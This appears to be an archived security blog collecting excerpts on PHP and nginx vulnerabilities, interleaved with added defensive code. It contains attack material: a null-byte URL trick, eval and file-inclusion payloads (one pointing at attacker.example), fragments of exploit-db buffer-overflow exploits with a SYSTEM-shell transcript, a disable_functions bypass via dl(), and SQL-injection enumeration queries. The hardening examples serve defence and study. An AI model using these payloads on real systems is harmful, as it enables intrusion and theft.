2011年8月25日
admin 712 views
from:https://nealpoole.com/blog/2011/07/possible-arbitrary-code-execution-with-null-bytes-php-and-old-versions-of-nginx/
After publishing my previous blog post on PHP, nginx configuration, and potential arbitrary code execution, I came across a separate null-byte injection vulnerability in older versions of nginx (0.5.*, 0.6.*, 0.7 <= 0.7.65, 0.8 <= 0.8.37). By taking advantage of this vulnerability, an attacker can cause a server that uses PHP-FastCGI to execute any publicly accessible file on the server as PHP.
In vulnerable versions of nginx, null bytes are allowed in URIs by default (their presence is indicated via a variable named zero_in_uri defined in ngx_http_request.h). Individual modules have the ability to opt-out of handling URIs with null bytes. However, not all of them do; in particular, the FastCGI module does not.
The attack itself is simple: a request for http://example.com/file.ext%00.php causes file.ext to be parsed as PHP. The regex location that routes *.php to FastCGI matches the full URI, so nginx hands PHP a SCRIPT_FILENAME that still contains the embedded null byte; PHP's C string handling truncates the path at that byte and opens file.ext as the script. If an attacker can control the contents of a file served by nginx (e.g. through an avatar upload form), the result is arbitrary code execution. This vulnerability cannot be mitigated by nginx configuration settings like try_files or PHP configuration settings like cgi.fix_pathinfo: the only defenses are to upgrade to a newer version of nginx or to explicitly block potentially malicious requests to directories containing user-controlled content. Read more…
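The blocking mitigation the post ends on, written out as an added example (not from the original post): an nginx server block that keeps user-uploaded content away from the PHP handler. The host name, the /uploads/ prefix, the /tmp and /cache directories and the FastCGI address are assumptions.

```nginx
# Added example, not from the original post. Assumes uploads are stored under
# /var/www/example.com/uploads and PHP runs behind FastCGI on 127.0.0.1:9000.
server {
    listen 80;
    server_name example.com;
    root /var/www/example.com;

    # ^~ : once /uploads/ is the longest matching prefix, nginx skips every
    # regex location, so /uploads/avatar.gif%00.php can never reach the
    # \.php$ handler below. Files here are served as static content only.
    location ^~ /uploads/ {
        add_header X-Content-Type-Options nosniff;
    }

    # For other directories holding user-controlled data: regex locations are
    # tried in order of appearance and the first match wins, so this deny must
    # sit before the PHP handler.
    location ~* ^/(tmp|cache)/.*\.php {
        return 403;
    }

    location ~ \.php$ {
        include fastcgi_params;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        fastcgi_pass 127.0.0.1:9000;
    }
}
```

Neither block replaces the upgrade; they narrow the attack to files the attacker cannot write. The ^~ form is the one to prefer: it does not depend on the ordering of regex locations, which is easy to break when the configuration is edited later.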
2010年5月4日
admin 1,368 views
http://www.exploit-db.com/papers/12490
##############################################################################
# [+]Title: [Eval() Vulnerability & Exploitation]
##############################################################################
# [+] About :
##############################################################################
# Written by : GlaDiaT0R
# Contact: the_gl4di4t0r[AT]hotmail[DOT]com or berrahal.ryadh[AT]gmail[DOT]com
# Team : Tunisian Power Team ( DarkGh0st.Net )
##############################################################################
# [+] Summary:
# [1]-Introduction
# [2]-Detection
# [3]-Vulnerable Source code
# [4]-Exploiting..
##############################################################################
[1]-Introduction
eval() is a PHP function that interprets a given string as PHP code. It is used often in web applications; although the string it interprets is rarely manipulated directly, eval() mostly serves to execute PHP code that contains previously defined variables.
The problem is that if eval() executes a variable whose value you can modify, the code it contains is executed as-is.
Reminder: eval() executes a given string as PHP code; it does not write the string's content into this page or any other (unless the code asks it to). It simply runs the code and displays the result.
We will look at two different PHP source files using eval(), the possibilities for PHP code injection, and how the way eval() is used changes the syntax of the PHP code to inject.
Read more…
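An added example, not from the paper, of the vulnerable pattern the introduction describes and of what to do instead when the real requirement is "evaluate an arithmetic expression": the calculator scenario, the function names and the grammar are assumptions.

```php
<?php
// Added example, not from the original paper. Two handlers for a hypothetical
// "calculator" parameter: the first pastes user text into the string that eval()
// compiles, the second evaluates the same arithmetic grammar without eval().

// Vulnerable: the expression becomes part of the code eval() runs, so an input
// such as   1; system('id'); //   executes system('id') on the server.
function calc_vulnerable(string $expr): string
{
    eval('$result = ' . $expr . ';');
    return (string) $result;
}

// Safe: a character whitelist followed by a recursive-descent evaluator for
//   expr := term (('+'|'-') term)*    term := factor (('*'|'/') factor)*
//   factor := INT | '(' expr ')' | '-' factor
// Anything outside that grammar is rejected; no user text is ever compiled.
final class SafeCalc
{
    private $tok = [];
    private $i = 0;

    public static function evaluate(string $expr): int
    {
        if (!preg_match('/^[0-9+\-*\/() \t]+$/', $expr)) {
            throw new InvalidArgumentException('disallowed character in expression');
        }
        preg_match_all('/\d+|[+\-*\/()]/', $expr, $m);
        $p = new self();
        $p->tok = $m[0];
        $v = $p->expr();
        if ($p->i !== count($p->tok)) {
            throw new InvalidArgumentException('trailing tokens after expression');
        }
        return $v;
    }

    private function peek(): ?string
    {
        return $this->tok[$this->i] ?? null;
    }

    private function expr(): int
    {
        $v = $this->term();
        while (($op = $this->peek()) === '+' || $op === '-') {
            $this->i++;
            $r = $this->term();
            $v = ($op === '+') ? $v + $r : $v - $r;
        }
        return $v;
    }

    private function term(): int
    {
        $v = $this->factor();
        while (($op = $this->peek()) === '*' || $op === '/') {
            $this->i++;
            $r = $this->factor();
            if ($op === '*') {
                $v *= $r;
            } elseif ($r === 0) {
                throw new DivisionByZeroError('division by zero');
            } else {
                $v = intdiv($v, $r);
            }
        }
        return $v;
    }

    private function factor(): int
    {
        $t = $this->peek();
        if ($t === null) {
            throw new InvalidArgumentException('unexpected end of expression');
        }
        $this->i++;
        if ($t === '(') {
            $v = $this->expr();
            if ($this->peek() !== ')') {
                throw new InvalidArgumentException('missing closing parenthesis');
            }
            $this->i++;
            return $v;
        }
        if ($t === '-') {
            return -$this->factor();
        }
        if (ctype_digit($t)) {
            return (int) $t;
        }
        throw new InvalidArgumentException("unexpected token '$t'");
    }
}

// Demonstration on constructed input; no request or network is needed.
$benign = '2*(3+4)';
$attack = "1; system('id'); //";
echo "vulnerable, benign input: ", calc_vulnerable($benign), "\n";
echo "safe, benign input:       ", SafeCalc::evaluate($benign), "\n";
try {
    SafeCalc::evaluate($attack);
} catch (InvalidArgumentException $e) {
    echo "safe, attack input rejected: ", $e->getMessage(), "\n";
}
// calc_vulnerable($attack) is deliberately not called: it would run system('id').
```

The whitelist regex alone is not the defense; the parser is. Characters such as `(` and `;` look harmless in a whitelist, but any string that reaches eval() is code, so the only safe design is one in which user input is data for an interpreter you wrote, never source for PHP's.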
2010年4月25日
xion 1,538 views
1. The dangerous functions involved: include(), require(), include_once(), require_once()
The include() and require() statements include and run the specified file.
The two constructs are identical except for how they handle failure: include() produces a warning, whereas require() causes a fatal error. In other words, use require() if you want processing of the page to stop when a file is missing; include() does not stop, and the script keeps running.
If "allow_url_fopen" is enabled in PHP (the default), the file to be included can also be specified as a URL (over HTTP or another supported wrapper) instead of a local path. If the target server interprets the target file as PHP code, variables can be passed to the included file through the query string of an HTTP GET request. (Note for current versions: since PHP 5.2.0 including a URL also requires allow_url_include, which is Off by default; allow_url_fopen alone is not enough.)
Reference: http://www.phpe.net/manual/function.include.php Read more…
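An added example, not from the original article or the PHP manual, of the include() pattern the passage warns about beside two hardened forms. The page router, the pages/ directory and the page names are assumptions.

```php
<?php
// Added example, not from the original article. A hypothetical page router:
// ?page=... selects which file under pages/ is included.

// Vulnerable. $page is concatenated into the include path, so:
//   ?page=../../../../etc/passwd%00        reads an arbitrary local file (the
//                                          %00 truncation worked before PHP 5.3.4),
//   ?page=../uploads/avatar.jpg%00         executes an uploaded file as PHP, and
//   ?page=http://attacker.example/s.txt%3F pulls remote code when
//                                          allow_url_include is On.
function render_vulnerable(string $page): void
{
    include 'pages/' . $page . '.php';
}

// Hardened (preferred): the parameter is a key into a fixed map, so user data
// never becomes part of a path at all.
function render_safe(string $page): void
{
    static $allowed = [
        'home'    => __DIR__ . '/pages/home.php',
        'about'   => __DIR__ . '/pages/about.php',
        'contact' => __DIR__ . '/pages/contact.php',
    ];
    if (!array_key_exists($page, $allowed)) {
        http_response_code(404);
        echo "no such page\n";
        return;
    }
    include $allowed[$page];
}

// Hardened (when the set of pages is not fixed): resolve the candidate with
// realpath() and accept it only if it stays inside the base directory.
// Returns the resolved path, or null when the name escapes or does not exist.
function resolve_page(string $baseDir, string $page): ?string
{
    if (strpos($page, "\0") !== false) {
        return null;                       // realpath() refuses null bytes anyway
    }
    $base = realpath($baseDir);
    $real = realpath($baseDir . '/' . $page . '.php');
    if ($base === false || $real === false) {
        return null;
    }
    if (strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;                       // resolved outside $baseDir
    }
    return $real;
}

// Demonstration with constructed parameters. Without a pages/ directory next
// to this script every candidate is reported as rejected, which is the point:
// only an existing file inside the base directory is ever returned.
foreach (['home', '../../../../etc/passwd', "../uploads/avatar.jpg\0"] as $candidate) {
    $r = resolve_page(__DIR__ . '/pages', $candidate);
    printf("%-32s => %s\n", addcslashes($candidate, "\0"), $r ?? 'rejected');
}
```

The map form is the one to reach for first; the realpath() form is for the case where pages are created at runtime, and its prefix test must compare against `$base . DIRECTORY_SEPARATOR`, not `$base` alone, or a sibling directory such as pages_old would pass.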
2010年4月15日
admin 2,042 views
Apache + PHP web security configuration: the full guide
Compiled by kindle
A personal compilation rather than original work; MySQL is skipped.
Apache side:
1. Build from source and change the default banner
2. Replace the default pages for HTTP status codes such as 404 and 503
3. Password-protect sensitive directories with .htaccess
4. Turn off directory listings: Options -Indexes
5. Turn off CGI execution: Options -ExecCGI
6. Confine PHP to a directory tree from the Apache config: php_admin_value open_basedir /var/www
7. Apache's PHP extension-parsing problem
Apache can hand a file such as shell.php.jpg to PHP because mod_mime looks at every extension in the name. Forbid files whose name contains ".php." by adding the following to the Apache configuration (the regex matches ".php" or ".php3" followed by any further character):
<Files ~ "\.(php.|php3.)">
Order Allow,Deny
Deny from all
</Files>
8. Take PHP execution away from the upload directory
Turn off PHP parsing under /www/home/upload:
<Directory "/www/home/upload">
<Files ~ "\.php">
Order allow,deny
Deny from all
</Files>
</Directory>
(Order/Allow/Deny is Apache 2.2 syntax; on Apache 2.4 the equivalent inside each <Files> block is Require all denied.)
PHP side:
Read more…
2010年4月14日
admin 1,864 views
来源:exploit-db.com
# Title: PHP 6.0 Dev str_transliterate() Buffer overflow – NX + ASLR Bypass
# EDB-ID: 12189
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Matteo Memelli
# Published: 2010-04-13
# Verified: yes
<?php
/*
04-06-2010 PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
Tested on Windows 2008 SP1 DEP alwayson
Matteo Memelli aka ryujin ( AT ) offsec.com
original sploit: http://www.exploit-db.com/exploits/12051 (Author: Pr0T3cT10n)
Thx to muts and Elwood for helping ;)
Bruteforce script is attached in base64 format.
root@bt:~# ./brute_php6.py 172.16.30.249 /pwnPhp6.php win2k8
(*) Php6 str_transliterate() bof || ryujin # offsec.com
(*) Bruteforcing WPM ret address…
(+) Trying base address 0x78000000
(+) Trying base address 0x77000000
(+) Trying base address 0x76000000
(+) Trying base address 0x75000000
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.
C:\wamp\bin\apache\Apache2.2.11>whoami
whoami
nt authority\system
*/
Read more…
2010年4月13日
admin 1,797 views
Using dl() to get past disable_functions and run commands (by 剑心)
Copyright notice: when reposting, cite the original source and author with a hyperlink and include this notice.
From: http://qiuren.blogbus.com
PHP is a powerful and widely used scripting language, and a large share of websites are built on it. Because it offers rich file-handling and system-interaction features, most servers lock PHP down: open_basedir restricts the directories it may touch, and disable_functions blocks the functions that run system commands directly, such as system, exec, passthru, shell_exec and proc_open. If the server does not also restrict dl(), however, dl() can be used to get around these limits.
dl() loads a PHP module dynamically from inside a script. By default it loads extensions from extension_dir, a PHP_INI_SYSTEM setting that can only be changed in php.ini or in Apache's main configuration. Dynamic loading can be switched off with the enable_dl option, but that option defaults to On and few people pay attention to it. dl() has a design flaw: a module name containing ../ traversal segments loads a .so (or other extension file) from any directory, so the extension_dir restriction can be bypassed at will. An attacker can therefore upload a .so of their own, load it with dl(), and use the functions it exports to do anything else, system commands included.
(Two caveats for readers today: since PHP 5.3 dl() is registered only by the cli, cgi and embed SAPIs and does not exist under mod_php, and current PHP rejects a dl() name that contains a directory separator with "Temporary module name should contain only filename", so the traversal itself no longer works. Setting enable_dl = Off and listing dl in disable_functions is still the right configuration.)
Read more…
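An added example, not from the original article: a PHP script that reports whether the conditions for the dl() technique hold on the host it runs on, by reading ini settings and the SAPI. The function name and the list of shell-spawning functions are assumptions.

```php
<?php
// Added example, not from the original article. Reports whether the dl()
// route described above is open on this host. It loads nothing and runs no
// command; every field comes from ini_get(), PHP_SAPI and function_exists().

function dl_bypass_assessment(): array
{
    $disabled = array_filter(array_map('trim',
        explode(',', (string) ini_get('disable_functions'))));
    // Functions the article lists as the usual targets of disable_functions,
    // plus popen (assumption: the set an auditor would normally check).
    $shellFns = ['system', 'exec', 'passthru', 'shell_exec', 'proc_open', 'popen'];

    $r = [
        // Since PHP 5.3 dl() is registered only by the cli, cgi/fcgi and embed
        // SAPIs; under mod_php it does not exist regardless of enable_dl.
        'sapi'                    => PHP_SAPI,
        // function_exists() is false both when the SAPI lacks dl() and when
        // dl is listed in disable_functions.
        'dl_defined'              => function_exists('dl'),
        'dl_in_disable_functions' => in_array('dl', $disabled, true),
        'enable_dl'               => filter_var(ini_get('enable_dl'), FILTER_VALIDATE_BOOLEAN),
        'extension_dir'           => (string) ini_get('extension_dir'),
        'open_basedir'            => (string) ini_get('open_basedir'),
        'shell_fns_still_open'    => array_values(array_diff($shellFns, $disabled)),
    ];
    // The article's attack needs all three: dl() present, not disabled, enable_dl on.
    $r['dl_reachable'] = $r['dl_defined'] && !$r['dl_in_disable_functions'] && $r['enable_dl'];
    return $r;
}

foreach (dl_bypass_assessment() as $k => $v) {
    $shown = is_array($v) ? (implode(',', $v) ?: '(none)') : var_export($v, true);
    printf("%-26s %s\n", $k, $shown);
}
```

Run it through the same SAPI the application uses (drop it in the web root and request it, not just `php -r`), because PHP_SAPI, enable_dl and disable_functions can all differ between the CLI and the web server's php.ini. A report with dl_reachable true and an uploads directory that accepts arbitrary files is the configuration the article exploits.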
2010年4月8日
admin 1,353 views
Analysis of security flaws caused by misuse of intval()
author: xy7#80sec.com
from: http://www.80vul.com/pch/
1. Description
intval() converts the way C's strtol() does: it skips leading whitespace, accepts an optional sign, consumes digits, and stops at the first character that is not a digit or at the end of the string (\0). Any other character before the first digit means nothing converts and the result is 0. (Since PHP 7.1 a numeric string in scientific notation such as "1e3" converts to 1000 rather than stopping at the "e".) In some applications an insufficient grasp of this property leads to checks that are made on the converted value while the raw string is used afterwards, which bypasses the check and produces a security flaw.
2. Analysis
PHP_FUNCTION(intval)
{
    zval **num, **arg_base;
    int base;

    switch (ZEND_NUM_ARGS()) {
        case 1:
            if (zend_get_parameters_ex(1, &num) == FAILURE) {
                WRONG_PARAM_COUNT;
            }
            base = 10;
            break;
        case 2:
            if (zend_get_parameters_ex(2, &num, &arg_base) == FAILURE) {
                WRONG_PARAM_COUNT;
            }
            convert_to_long_ex(arg_base);
            base = Z_LVAL_PP(arg_base);
            break;
        default:
            WRONG_PARAM_COUNT;
    }

    RETVAL_ZVAL(*num, 1, 0);
    convert_to_long_base(return_value, base);
}
Read more…
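An added example, not from the original analysis: the first function runs intval() over a few constructed strings to show the conversion rule, and the next two show the bug pattern the article describes beside its fix. The users table and the id and name columns are assumptions.

```php
<?php
// Added example, not from the original analysis.

// The conversion rule on constructed inputs: leading whitespace is skipped, an
// optional sign and the digits are consumed, and conversion stops at the first
// non-digit. A non-digit before the first digit means nothing converts.
function intval_samples(): array
{
    $inputs = [
        '42',                    // plain digits
        '  42abc',               // whitespace skipped, stops at 'a'
        '-7 OR 1=1',             // sign accepted, stops at the space
        'abc42',                 // non-digit first: nothing converts
        '1 UNION SELECT 1,2,3',  // the payload the vulnerable check lets through
    ];
    $out = [];
    foreach ($inputs as $s) {
        $out[] = [$s, intval($s)];
    }
    return $out;
}

// Vulnerable: the check is made on intval($id) but the raw string goes into
// the query, so "1 UNION SELECT ..." satisfies the check and reaches MySQL.
function build_query_vulnerable(string $id): ?string
{
    if (intval($id) <= 0) {
        return null;
    }
    return "SELECT name FROM users WHERE id = $id";
}

// Fixed: the whole string must be an integer, and the converted integer, not
// the original string, is what the query receives.
function build_query_safe(string $id): ?string
{
    $n = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($n === false) {
        return null;
    }
    return "SELECT name FROM users WHERE id = $n";
}

foreach (intval_samples() as [$s, $n]) {
    printf("intval(%-24s) = %d\n", var_export($s, true), $n);
}
$payload = '1 UNION SELECT 1,2,3';
echo "vulnerable: ", build_query_vulnerable($payload) ?? 'rejected', "\n";
echo "safe:       ", build_query_safe($payload) ?? 'rejected', "\n";
```

The same rule applies to any "validate then use" pair: the value that passed validation is the only one allowed to travel onward. Casting with (int) at the point of use, or binding the integer as a prepared-statement parameter, closes the gap just as well as filter_var(); what does not work is checking intval($id) and then interpolating $id.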
2010年4月5日
admin 14,099 views
来源packetstorm.com
Web Application Auditing and Exploitation
By ReZEN
Index Title
Index
What is a Web Application
Intro To PHP
Function Exploitation Overview
Exploitable Functions
Examples
Application Assisted Auditing
Credits
Gr33tz / Fuckz
What is a “WebApp”?
In software engineering, a web application, sometimes called a webapp and much less frequently a weblication, is an application that's accessed with a web browser over a network such as the Internet or an intranet. Web applications are popular due to the ubiquity of the browser as a client, sometimes called a thin client. The ability to update and maintain web applications without distributing and installing software on potentially thousands of client computers is a key reason for their popularity. Web applications are used to implement webmail, online retail sales, online auctions, wikis, discussion boards, weblogs, MMORPGs, and many other functions.
What is a “WebApp”? (cont.)
Read more…
2010年4月5日
admin 1,584 views
来源:http://www.exploit-db.com/exploits/12051
# Title: PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
# EDB-ID: 12051
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Pr0T3cT10n
# Published: 2010-04-04
# Verified: no
<?php
error_reporting(0);
#####################################################################
## PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
## Tested on WIN XP HEB SP3, Apache, PHP 6.0 Dev
## Buffer Overflow
## Bug discovered by Pr0T3cT10n, <pr0t3ct10n@gmail.com>
## Exploited by TheLeader, Debug
## SP. Thanks: HDM
## http://www.nullbyte.org.il
#####################################################################
## This code should exploit a buffer overflow in the str_transliterate() function to call WinExec and execute CALC
## Take a look, 'unicode.semantics' has to be on!
## php.ini > unicode.semantics = on
#####################################################################
if(ini_get_bool('unicode.semantics')) {
$buff = str_repeat("\u4141", 256);
$eip = "\u1445\u10A9"; # 0x10A91445 JMP ESP @ php6ts.dll
$nops = str_repeat("\u9090", 20);
Read more…
2010年3月30日
xion 1,449 views
MySQL 5 has the information_schema database. I seem to have seen this somewhere before; today I checked for myself: information_schema.tables and information_schema.columns have a TABLE_SCHEMA column that restricts by database, rather than SCHEMA_NAME. Noting it down.
List the databases:
select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA;
List the tables of a given database:
select group_concat(table_name) from information_schema.tables where TABLE_SCHEMA=0x73716c696e;
List the tables of the current database:
select group_concat(table_name) from information_schema.tables where TABLE_SCHEMA=database();
List the columns of a given table in a given database:
select group_concat(column_name) from information_schema.columns where table_name=0x61646d696e and TABLE_SCHEMA=0x73716c696e;
The hex literals are the names written without quote characters: 0x73716c696e is the database name sqlin and 0x61646d696e is the table name admin. MySQL compares an unquoted 0x... literal as a string, which is why this form survives quote filtering in injection payloads, and group_concat() packs the whole result set into one value so that a single returned row is enough to read it out.